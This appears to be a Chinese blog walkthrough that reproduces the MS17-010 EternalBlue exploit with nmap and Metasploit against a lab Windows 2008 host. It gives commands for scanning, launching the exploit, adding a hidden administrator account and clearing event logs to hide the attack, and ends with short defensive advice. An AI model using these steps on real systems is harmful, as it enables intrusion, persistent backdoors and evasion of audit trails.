ms17-010 永恒之蓝复现

介绍

ms17-010是利用445(smb)端口的远程代码执行漏洞,编号CVE-2017-0143。
影响范围很广,可以参看百度百科
这里复现win2008 x64版本

环境

靶机:windows2008 x64
IP: 192.168.237.132
攻击机:kali 2021
IP: 192.168.237.128
工具:nmap、msf

漏洞利用

扫描靶机是否存在该漏洞

nmap --script smb-vuln* 192.168.237.132
在这里插入图片描述

漏洞利用

发现存在漏洞,接下来利用msf工具
在这里插入图片描述
我们可以先用扫描模块再次扫描下,
在这里插入图片描述
发现确实是存在ms17-010漏洞,接下来我们就可以用漏洞利用模块了
use 2
exploit/windows/smb/ms17_010_eternalblue
在这里插入图片描述
设置好参数后,开始攻击
在这里插入图片描述
利用成功后,会出现meterpreter >
Meterpreter是Metasploit 的一个扩展模块,可以调用 Metasploit 的一些功能,对目标系统进行更深入的渗透,如获取屏幕、上传/下载文件、创建持久后门等。

实施攻击

  • 查看靶机进程ps
    在这里插入图片描述

  • 监控靶机桌面run vnc
    在这里插入图片描述

  • 对靶机截屏screenshot
    在这里插入图片描述

  • 进入靶机cmdshell
    在这里插入图片描述

  • 添加用户并加入管理组
    net user hack 123.com /add
    net localgroup administrator hack /add
    net user查看用户
    在这里插入图片描述

  • 清除日志clearev
    我们可以查看下靶机的时件日志
    在这里插入图片描述
    我们需要清除攻击痕迹(毁尸灭迹哈哈)不然容易被发现。

在这里插入图片描述
在这里插入图片描述

还有很多的利用,这里就不一一展示了。

防御

关闭445端口
及时安装补丁
开启防火墙等等。

猜你喜欢

转载自blog.csdn.net/weixin_44033675/article/details/117201451
今日推荐